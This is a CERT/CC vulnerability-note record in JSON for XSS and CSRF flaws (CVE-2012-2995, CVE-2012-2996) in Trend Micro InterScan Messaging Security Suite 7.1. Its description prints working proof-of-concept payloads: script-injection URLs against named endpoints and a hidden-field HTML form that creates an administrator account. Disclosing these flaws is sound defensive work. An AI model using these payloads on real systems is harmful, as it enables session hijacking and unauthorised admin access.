{"vuid":"VU#471364","idnumber":"471364","name":"Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities","keywords":["Trend Micro","InterScan Messaging Security Suite","CSRF","cwe-352","xss","cwe-79"],"overview":"Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.","clean_desc":"Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities. Cross-site scripting (CVE-2012-2995) (CWE-79)\nPersistent/Stored XSS\nhxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss\"><script>alert('XSS')</script> Non-persistent/Reflected XSS\nhxxps://127.0.0.1/initUpdSchPage.imss?src=\"><script>alert('XSS')</script> Cross-site request forgery (CVE-2012-2996) (CWE-352)\nCSRF add admin privilege account\n<html>\n<body>\n<form action=\"hxxps://127.0.0.1:8445/saveAccountSubTab.imss\" method=\"POST\">\n<input type=\"hidden\" name=\"enabled\" value=\"on\" />\n<input type=\"hidden\" name=\"authMethod\" value=\"1\" />\n<input type=\"hidden\" name=\"name\" value=\"quorra\" />\n<input type=\"hidden\" name=\"password\" value=\"quorra&#46;123\" />\n<input type=\"hidden\" name=\"confirmPwd\" value=\"quorra&#46;123\" />\n<input type=\"hidden\" name=\"tabAction\" value=\"saveAuth\" />\n<input type=\"hidden\" name=\"gotoTab\" value=\"saveAll\" />\n<input type=\"submit\" value=\"CSRF\" />\n</form>\n</body>\n</html>","impact":"An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.","resolution":"We are currently unaware of a practical solution to this problem. Please consider the following workarounds.","workarounds":"Restrict access As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.","sysaffected":"","thanks":"Thanks to Tom Gregory for reporting this vulnerability.","author":"This document was written by Jared Allar.","public":["http://cwe.mitre.org/data/definitions/352.html","http://cwe.mitre.org/data/definitions/79.html","http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html"],"cveids":["CVE-2012-2995","CVE-2012-2996"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2012-07-30T17:55:12Z","publicdate":"2012-09-13T00:00:00Z","datefirstpublished":"2012-09-13T17:32:52Z","dateupdated":"2014-08-15T02:53:45Z","revision":18,"vrda_d1_directreport":"1","vrda_d1_population":"2","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"M","cvss_authentication":null,"cvss_confidentialityimpact":"P","cvss_integrityimpact":"P","cvss_availabilityimpact":"P","cvss_exploitablity":null,"cvss_remediationlevel":"U","cvss_reportconfidence":"UC","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"6.8","cvss_basevector":"AV:N/AC:M/Au:N/C:P/I:P/A:P","cvss_temporalscore":"5.5","cvss_environmentalscore":"1.38152301828188","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}